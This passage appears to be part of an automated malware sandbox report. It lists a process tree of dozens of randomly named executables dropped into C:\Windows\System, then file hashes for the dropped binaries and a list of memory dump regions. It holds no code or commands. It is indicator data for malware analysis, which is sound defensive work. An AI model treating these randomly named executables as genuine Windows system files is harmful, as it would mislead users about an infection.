  2⤵
  PID:3852
- C:\Windows\System\sDutJde.exe
  C:\Windows\System\sDutJde.exe
  2⤵
  PID:2772
- C:\Windows\System\mjvrPSe.exe
  C:\Windows\System\mjvrPSe.exe
  2⤵
  PID:4360
- C:\Windows\System\YrORGqy.exe
  C:\Windows\System\YrORGqy.exe
  2⤵
  PID:5112
- C:\Windows\System\MmFBhNj.exe
  C:\Windows\System\MmFBhNj.exe
  2⤵
  PID:1336
- C:\Windows\System\iMNjwAZ.exe
  C:\Windows\System\iMNjwAZ.exe
  2⤵
  PID:1988
- C:\Windows\System\YVLiBvO.exe
  C:\Windows\System\YVLiBvO.exe
  2⤵
  PID:5300
- C:\Windows\System\OWEFauM.exe
  C:\Windows\System\OWEFauM.exe
  2⤵
  PID:4968
- C:\Windows\System\wsjrBEW.exe
  C:\Windows\System\wsjrBEW.exe
  2⤵
  PID:5212
- C:\Windows\System\jKFVgGR.exe
  C:\Windows\System\jKFVgGR.exe
  2⤵
  PID:5364
- C:\Windows\System\iTKQuyt.exe
  C:\Windows\System\iTKQuyt.exe
  2⤵
  PID:5548
- C:\Windows\System\WIpJUkw.exe
  C:\Windows\System\WIpJUkw.exe
  2⤵
  PID:5744
- C:\Windows\System\gaJohkb.exe
  C:\Windows\System\gaJohkb.exe
  2⤵
  PID:5632
- C:\Windows\System\XUDRvvN.exe
  C:\Windows\System\XUDRvvN.exe
  2⤵
  PID:4000
- C:\Windows\System\WwyeRlw.exe
  C:\Windows\System\WwyeRlw.exe
  2⤵
  PID:5328
- C:\Windows\System\cbeTCZF.exe
  C:\Windows\System\cbeTCZF.exe
  2⤵
  PID:5368
- C:\Windows\System\uAmwiJQ.exe
  C:\Windows\System\uAmwiJQ.exe
  2⤵
  PID:5856
- C:\Windows\System\cLBhpQg.exe
  C:\Windows\System\cLBhpQg.exe
  2⤵
  PID:5680
- C:\Windows\System\wctFPDZ.exe
  C:\Windows\System\wctFPDZ.exe
  2⤵
  PID:5760
- C:\Windows\System\JCHSJVP.exe
  C:\Windows\System\JCHSJVP.exe
  2⤵
  PID:5996
- C:\Windows\System\dwrYPek.exe
  C:\Windows\System\dwrYPek.exe
  2⤵
  PID:6112
- C:\Windows\System\bpBNHoG.exe
  C:\Windows\System\bpBNHoG.exe
  2⤵
  PID:6124
- C:\Windows\System\ZBvpzdy.exe
  C:\Windows\System\ZBvpzdy.exe
  2⤵
  PID:5272
- C:\Windows\System\pVwmfCB.exe
  C:\Windows\System\pVwmfCB.exe
  2⤵
  PID:4152
- C:\Windows\System\Yweppjx.exe
  C:\Windows\System\Yweppjx.exe
  2⤵
  PID:1372
- C:\Windows\System\rlGyNDg.exe
  C:\Windows\System\rlGyNDg.exe
  2⤵
  PID:5672
- C:\Windows\System\NaZbQmx.exe
  C:\Windows\System\NaZbQmx.exe
  2⤵
  PID:6064
- C:\Windows\System\nFUGFKR.exe
  C:\Windows\System\nFUGFKR.exe
  2⤵
  PID:5712
- C:\Windows\System\OYHlyBV.exe
  C:\Windows\System\OYHlyBV.exe
  2⤵
  PID:5164
- C:\Windows\System\BwiZFSI.exe
  C:\Windows\System\BwiZFSI.exe
  2⤵
  PID:5228
- C:\Windows\System\Kuravkg.exe
  C:\Windows\System\Kuravkg.exe
  2⤵
  PID:5644
- C:\Windows\System\HILsPmV.exe
  C:\Windows\System\HILsPmV.exe
  2⤵
  PID:6036
- C:\Windows\System\URKQgzn.exe
  C:\Windows\System\URKQgzn.exe
  2⤵
  PID:5324
- C:\Windows\System\lCfyghx.exe
  C:\Windows\System\lCfyghx.exe
  2⤵
  PID:4800
- C:\Windows\System\JwHMuia.exe
  C:\Windows\System\JwHMuia.exe
  2⤵
  PID:6032
- C:\Windows\System\CfxDaOn.exe
  C:\Windows\System\CfxDaOn.exe
  2⤵
  PID:6092
- C:\Windows\System\XsoBRQc.exe
  C:\Windows\System\XsoBRQc.exe
  2⤵
  PID:4176
- C:\Windows\System\cjMUzfM.exe
  C:\Windows\System\cjMUzfM.exe
  2⤵
  PID:5852
- C:\Windows\System\hGfLAQe.exe
  C:\Windows\System\hGfLAQe.exe
  2⤵
  PID:5972
- C:\Windows\System\XqNDPWY.exe
  C:\Windows\System\XqNDPWY.exe
  2⤵
  PID:1196
- C:\Windows\System\vMyldoo.exe
  C:\Windows\System\vMyldoo.exe
  2⤵
  PID:1844
- C:\Windows\System\dCFMhIw.exe
  C:\Windows\System\dCFMhIw.exe
  2⤵
  PID:5288
- C:\Windows\System\sSFajwj.exe
  C:\Windows\System\sSFajwj.exe
  2⤵
  PID:5296
- C:\Windows\System\ZpZbGLY.exe
  C:\Windows\System\ZpZbGLY.exe
  2⤵
  PID:5584
- C:\Windows\System\ylvpERV.exe
  C:\Windows\System\ylvpERV.exe
  2⤵
  PID:6016
- C:\Windows\System\ZsLatIo.exe
  C:\Windows\System\ZsLatIo.exe
  2⤵
  PID:6152
- C:\Windows\System\JEfQGfi.exe
  C:\Windows\System\JEfQGfi.exe
  2⤵
  PID:6168
- C:\Windows\System\Tgxxjxd.exe
  C:\Windows\System\Tgxxjxd.exe
  2⤵
  PID:6224
- C:\Windows\System\dpVoIKm.exe
  C:\Windows\System\dpVoIKm.exe
  2⤵
  PID:6240
- C:\Windows\System\VmIiCgp.exe
  C:\Windows\System\VmIiCgp.exe
  2⤵
  PID:6256
- C:\Windows\System\VLsvapz.exe
  C:\Windows\System\VLsvapz.exe
  2⤵
  PID:6272
- C:\Windows\System\MGtVUeb.exe
  C:\Windows\System\MGtVUeb.exe
  2⤵
  PID:6292
- C:\Windows\System\cAweUKb.exe
  C:\Windows\System\cAweUKb.exe
  2⤵
  PID:6308
- C:\Windows\System\RKlgwWN.exe
  C:\Windows\System\RKlgwWN.exe
  2⤵
  PID:6324
- C:\Windows\System\KfxpHvf.exe
  C:\Windows\System\KfxpHvf.exe
  2⤵
  PID:6340
- C:\Windows\System\zePNOvt.exe
  C:\Windows\System\zePNOvt.exe
  2⤵
  PID:6408
- C:\Windows\System\KHfidyS.exe
  C:\Windows\System\KHfidyS.exe
  2⤵
  PID:6424
- C:\Windows\System\fwqNpcT.exe
  C:\Windows\System\fwqNpcT.exe
  2⤵
  PID:6440
- C:\Windows\System\larpRop.exe
  C:\Windows\System\larpRop.exe
  2⤵
  PID:6456
- C:\Windows\System\HQYgqgk.exe
  C:\Windows\System\HQYgqgk.exe
  2⤵
  PID:6472
- C:\Windows\System\GVSeNMU.exe
  C:\Windows\System\GVSeNMU.exe
  2⤵
  PID:6488
- C:\Windows\System\fgQpAkm.exe
  C:\Windows\System\fgQpAkm.exe
  2⤵
  PID:6644
- C:\Windows\System\UXqzjuX.exe
  C:\Windows\System\UXqzjuX.exe
  2⤵
  PID:6876
- C:\Windows\System\pMusviH.exe
  C:\Windows\System\pMusviH.exe
  2⤵
  PID:6892
- C:\Windows\System\qzeydsQ.exe
  C:\Windows\System\qzeydsQ.exe
  2⤵
  PID:6908
- C:\Windows\System\VfFYjiD.exe
  C:\Windows\System\VfFYjiD.exe
  2⤵
  PID:6924
- C:\Windows\System\xpkyDqF.exe
  C:\Windows\System\xpkyDqF.exe
  2⤵
  PID:6940
- C:\Windows\System\gysghYc.exe
  C:\Windows\System\gysghYc.exe
  2⤵
  PID:6956
- C:\Windows\System\EUOWPrR.exe
  C:\Windows\System\EUOWPrR.exe
  2⤵
  PID:6972
- C:\Windows\System\taWAWPD.exe
  C:\Windows\System\taWAWPD.exe
  2⤵
  PID:6988
- C:\Windows\System\NxyIELd.exe
  C:\Windows\System\NxyIELd.exe
  2⤵
  PID:7104
- C:\Windows\System\JUnYcJV.exe
  C:\Windows\System\JUnYcJV.exe
  2⤵
  PID:7120
- C:\Windows\System\gpniDlg.exe
  C:\Windows\System\gpniDlg.exe
  2⤵
  PID:7136

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\system\AGybZts.exe

Filesize
467KB

MD5
102ca89dd81395b8adbc0d48f4a8c0e0

SHA1
11f74bacf7c03cce492ddb75f62f8d8c2fcb22ac

SHA256
3cca81631e02b47b6f847fd7649748c896803d74e4c1980ac6f27f6b4c3331d8

SHA512
1efcb49fc5ee1e7e6c4241482e6b2989723b4e32df802210445f918c607bc11ae7778b9e06f784a96bcfb52031b52a42f731ff1cf3751bda97a8307d36caa745

Download Submit
C:\Windows\system\LjorIoZ.exe

Filesize
320KB

MD5
2e8a0d5ea7550fb0b4532c813b2d0613

SHA1
bf392f51a8f051779f6bddfbe3702d0ed01ce5d9

SHA256
80a55bb8ef58bd405c4cb7601035d53b8aa8a6c7e580dc0d37aadaa57e78300f

SHA512
b397ce3e26425a1fb03690b66d2f9617d94e327e795ea68df8c1a82ff6374adde8b78c7a63794b37503e381c0797f5e65578f4213bea00044ec833354f52dbf1

Download Submit
C:\Windows\system\TWcGqGl.exe

Filesize
1.1MB

MD5
95effe9cf469b40aa9f868b9ecb21e8d

SHA1
545d8f5ac98d15cfc767dbc73bb7d5b8a6ca2fe2

SHA256
840ffc64e02125c03410d03e93a912c85d674a5475a993c0a658f5d682b6f72f

SHA512
394fee8f90f371bf5d43cf01f1097827aa366970a20807e0acee43bb23173ccc271b6ba500ec6897ca24e68f04df177b5d72ca79741b66cd9423fab7aab0bd46

Download Submit
C:\Windows\system\WwAkfQV.exe

Filesize
535KB

MD5
67f6b5c9e7d5f5a4b45863ae8bd4fd90

SHA1
bcd1ee8edad609c68fe74c6a91608664e928411c

SHA256
aae9833061567bc7c88660b6cbec682eea9bc97798a9045898f8e043006410a7

SHA512
923d919e194e837b97ae83e7722719de666b28305d37796f80441e266b5bd5fafcf9d2f5d7bb8aa4ead89d00aaebe4138d11871de66aa2e26e2b85d7c8d5eb5a

Download Submit
C:\Windows\system\nlrfWhB.exe

Filesize
449KB

MD5
24aadb01330df41b300d6a177805263b

SHA1
68293e64eb0334343c0b62927d74e21aaff304db

SHA256
e736981d3eb4e111e5672f1085b9585f33134973046946a8b46d83742d55ba85

SHA512
8257c4d69fddf055cac952a87445d05b94ca52402f8d25bf993f6a22a781accc2fbc6fbb4ca27479d1000bb2e8871c27f3862375fd83ae5864c8391e5f84b547

Download Submit
C:\Windows\system\tGkmUBM.exe

Filesize
213KB

MD5
83df439e8880623baf7e231b199eb9c4

SHA1
61b99591c02baa1b49e87b81e97f7abce1510dc7

SHA256
9ebf6c6cbe0c2c7ff3241aa955bd4a962f0ef70dd39a06b303f7010024a1f822

SHA512
fb3deb76043a68998bef0a4558bc5740bd808d937e78cc2ce1e87befe5b78e32bd45b1388f10b08eb63faac4032215f40d1659b391c10f7ca6375f0907d8bd2a

Download Submit
C:\Windows\system\vCPceOq.exe

Filesize
382KB

MD5
c1f308fba186a825ba6ae1c11de3448a

SHA1
473c4a2553e449104d714c2230160d5c0a1a9c98

SHA256
5b469b75a9102a25cdd1227d3e4634131f7c2d5f9f085875475dd100c688b290

SHA512
fe89934f1e5584541f248545cbfc125fa5f0de8d78b2313bb30a1ac2dc4bf1bf8e47b77886fa8fbb8c468b48708bd6b5a3c5f8dc3719981139f7ea08d579d546

Download Submit
C:\Windows\system\xuMnbAT.exe

Filesize
217KB

MD5
0af5de943f2d6323418b17f543d8f5a8

SHA1
8bc3b972430c08b436df84f7cb05eb3645c12404

SHA256
adc9bca68630375904f41084de4f869d38e3183cfee1b0962e8f2fee3e118c18

SHA512
2e6b0811f3f54bccf67749489b2921c29717cdf6936ed2b61b5c6ebbf0c621329e9ca58a257b7e9ff0beabe0626ca04176fdafb338494f974a2d4351d9a65f0e

Download Submit
\Windows\system\DsbEKdB.exe

Filesize
64KB

MD5
f61c033bf90b57d89bbda83991a10cb8

SHA1
4dd1989432a3c70ae1d2a687aed6495d1257fd5f

SHA256
dbf10af3247ddefb7b9c32009a80a6bf7d4375b499071bdb078f40bd53daed8d

SHA512
4fba3cdd8da9ea55317fed64c7e23f6810baf3b5e602836f81078cdb4f71e6da87d5b82e0047f440ddc702d4fe26c4c03bc618ca357176222ea8c6ddc485e7d7

Download Submit
\Windows\system\TWcGqGl.exe

Filesize
1.2MB

MD5
71b185774642511a08861f31d951bc91

SHA1
cf3c0ff99bc48952afc8489372060888bc0c5165

SHA256
ae536eab2547f15d79b80530db3f7ef4b40b195b23a3146631124893f2b6c76c

SHA512
4667e9ead71f3db87e53a5ba8ac23584dde2644d7eba8e65c28b586fb405ceb65c923de6640397b94807728327a1d9d2e07c025057e2c5ed2246d22c0d9f2b18

Download Submit
\Windows\system\nlrfWhB.exe

Filesize
277KB

MD5
f6dbb5016bf590804f19c3081f2c9949

SHA1
ddd99fe7d17be953922f18b3bb9ed94b568a4a56

SHA256
8f0881b1e2157c58303f344ce2a33256cac195b408eccac8b562c376ff546edf

SHA512
b8eed2e4784e6d88aa76e4cc4395269b1bbff7c6d7dad0a3b3297b485a0d129eb418d749140a5562f64d0b26c8a1fe8c886f7f10c143f5d8c2dffe5c498b7aa8

Download Submit
\Windows\system\tGkmUBM.exe

Filesize
625KB

MD5
7de7a3c1facbdabdad64202d7103a430

SHA1
6c67ae6859b9cac5c0ae85a36902d4d0d8ba21b3

SHA256
8e325c0bdd0cd6673b6f26ba90ad29db1ccbf9aa615c3f3c1e3b10e3a19eff39

SHA512
51a1f3654732ecf5770cbd57c9fa05ee0a7a561e1da70b17bac622b0c4000aef58c091f1cbfa227bbeb35fb657e5c903ccec85b2be525d2be16db94dbc7c5526

Download Submit
\Windows\system\uVkJIJI.exe

Filesize
128KB

MD5
c1720bf6b92ec132d7564eac731fc38f

SHA1
70cb8ffa2b3c3f8755068ca52ef45bc05053e04c

SHA256
309ed1ac33cfbd551bec7fd27b31f8fba68ad8bf7555488bc49b3b419365ad4e

SHA512
bded35dca34da2db81635bd0b1bc8528f941dd3d298b7d8e44ed0acabcd10f167e10f2462737f28b287efd04cf55f2df73664e00f0d667cdbfbf8904a731f97f

Download Submit
\Windows\system\vKyQzym.exe

Filesize
595KB

MD5
cd909cd27a75cf046154c188056986c8

SHA1
86f1c37823e469b734d9015cf865a5b79a2a9ebe

SHA256
f059d219be240cea806134f770c910cb2935f61ce9275d646e80548b75ca324c

SHA512
5fef150edf5a29c259f10c62dfae79acd479d5c985a4efb84a051eb546a137013cb41b22288c4ac91d3dd08b0b032685f4f57ce3474473986bd5ad268221a733

Download Submit
\Windows\system\zRPOEnk.exe

Filesize
86KB

MD5
6c86a106c5734421e8e8671da9b4f28a

SHA1
00ea26586126051d0ab1f82c86f75aa89a97d496

SHA256
72e978ac24357068485cee507b460efe16d2d04bada7b88de87e6db23e169db1

SHA512
af0ccf6f455d5fb5511744799a14bab593cbd886d8e04dcc71a485fd1e40178cd7946dfb0e860c21316d3403bb3ae9fe717d571235cab3a893a74866a5d45831

Download Submit
memory/784-886-0x000000013FDD0000-0x00000001401C6000-memory.dmp

Filesize
4.0MB

Download
memory/1088-1015-0x000000013FC00000-0x000000013FFF6000-memory.dmp

Filesize
4.0MB

Download
memory/1476-626-0x000000013FFA0000-0x0000000140396000-memory.dmp

Filesize
4.0MB

Download
memory/1476-862-0x000000013FFA0000-0x0000000140396000-memory.dmp

Filesize
4.0MB

Download
memory/1500-940-0x000000013F6A0000-0x000000013FA96000-memory.dmp

Filesize
4.0MB

Download
memory/1516-993-0x000000013F250000-0x000000013F646000-memory.dmp

Filesize
4.0MB

Download
memory/1608-887-0x000000013FA00000-0x000000013FDF6000-memory.dmp

Filesize
4.0MB

Download
memory/1644-939-0x000000013FDD0000-0x00000001401C6000-memory.dmp

Filesize
4.0MB

Download
memory/1652-963-0x000000013FF00000-0x00000001402F6000-memory.dmp

Filesize
4.0MB

Download
memory/1748-964-0x000000013F3E0000-0x000000013F7D6000-memory.dmp

Filesize
4.0MB

Download
memory/1796-882-0x000000013F5D0000-0x000000013F9C6000-memory.dmp

Filesize
4.0MB

Download
memory/1976-863-0x000000013FA40000-0x000000013FE36000-memory.dmp

Filesize
4.0MB

Download
memory/1976-765-0x000000013FA40000-0x000000013FE36000-memory.dmp

Filesize
4.0MB

Download
memory/2096-967-0x000000013F310000-0x000000013F706000-memory.dmp

Filesize
4.0MB

Download
memory/2148-885-0x000000013FC40000-0x0000000140036000-memory.dmp

Filesize
4.0MB

Download
memory/2216-1014-0x000000013F580000-0x000000013F976000-memory.dmp

Filesize
4.0MB

Download
memory/2240-912-0x000000013F0D0000-0x000000013F4C6000-memory.dmp

Filesize
4.0MB

Download
memory/2292-965-0x000000013F260000-0x000000013F656000-memory.dmp

Filesize
4.0MB

Download
memory/2388-363-0x000000013F940000-0x000000013FD36000-memory.dmp

Filesize
4.0MB

Download
memory/2436-913-0x000000013F120000-0x000000013F516000-memory.dmp

Filesize
4.0MB

Download
memory/2516-855-0x000000013F530000-0x000000013F926000-memory.dmp

Filesize
4.0MB

Download
memory/2516-40-0x000000013F530000-0x000000013F926000-memory.dmp

Filesize
4.0MB

Download
memory/2548-858-0x000000013F820000-0x000000013FC16000-memory.dmp

Filesize
4.0MB

Download
memory/2600-857-0x000000013F580000-0x000000013F976000-memory.dmp

Filesize
4.0MB

Download
memory/2600-100-0x000000013F580000-0x000000013F976000-memory.dmp

Filesize
4.0MB

Download
memory/2652-972-0x000000013F8E0000-0x000000013FCD6000-memory.dmp

Filesize
4.0MB

Download
memory/2664-941-0x000000013FD10000-0x0000000140106000-memory.dmp

Filesize
4.0MB

Download
memory/2712-835-0x000000013F5E0000-0x000000013F9D6000-memory.dmp

Filesize
4.0MB

Download
memory/2784-469-0x000000013FF80000-0x0000000140376000-memory.dmp

Filesize
4.0MB

Download
memory/2872-0-0x000000013F410000-0x000000013F806000-memory.dmp

Filesize
4.0MB

Download
memory/2872-8-0x000000013FED0000-0x00000001402C6000-memory.dmp

Filesize
4.0MB

Download
memory/2872-289-0x000000013F940000-0x000000013FD36000-memory.dmp

Filesize
4.0MB

Download
memory/2872-580-0x000000013FDD0000-0x00000001401C6000-memory.dmp

Filesize
4.0MB

Download
memory/2872-877-0x000000013FD10000-0x0000000140106000-memory.dmp

Filesize
4.0MB

Download
memory/2872-382-0x000000013FF80000-0x0000000140376000-memory.dmp

Filesize
4.0MB

Download
memory/2872-1-0x00000000000F0000-0x0000000000100000-memory.dmp

Filesize
64KB

Download
memory/2872-544-0x000000013FFA0000-0x0000000140396000-memory.dmp

Filesize
4.0MB

Download
memory/2872-435-0x000000013FDF0000-0x00000001401E6000-memory.dmp

Filesize
4.0MB

Download
memory/2872-914-0x0000000004470000-0x0000000004866000-memory.dmp

Filesize
4.0MB

Download
memory/2872-700-0x0000000003130000-0x0000000003526000-memory.dmp

Filesize
4.0MB

Download
memory/2872-673-0x000000013FA40000-0x000000013FE36000-memory.dmp

Filesize
4.0MB

Download
memory/2872-86-0x000000013F820000-0x000000013FC16000-memory.dmp

Filesize
4.0MB

Download
memory/2900-988-0x000000013F570000-0x000000013F966000-memory.dmp

Filesize
4.0MB

Download
memory/2952-883-0x000000013FDF0000-0x00000001401E6000-memory.dmp

Filesize
4.0MB

Download
memory/2952-538-0x000000013FDF0000-0x00000001401E6000-memory.dmp

Filesize
4.0MB

Download
memory/2972-890-0x000000013F310000-0x000000013F706000-memory.dmp

Filesize
4.0MB

Download
memory/3012-9-0x000000013FED0000-0x00000001402C6000-memory.dmp

Filesize
4.0MB

Download
memory/3028-354-0x000007FEF44F0000-0x000007FEF4E8D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-184-0x000007FEF44F0000-0x000007FEF4E8D000-memory.dmp

Filesize
9.6MB

Download
memory/3028-257-0x00000000029C0000-0x0000000002A40000-memory.dmp

Filesize
512KB

Download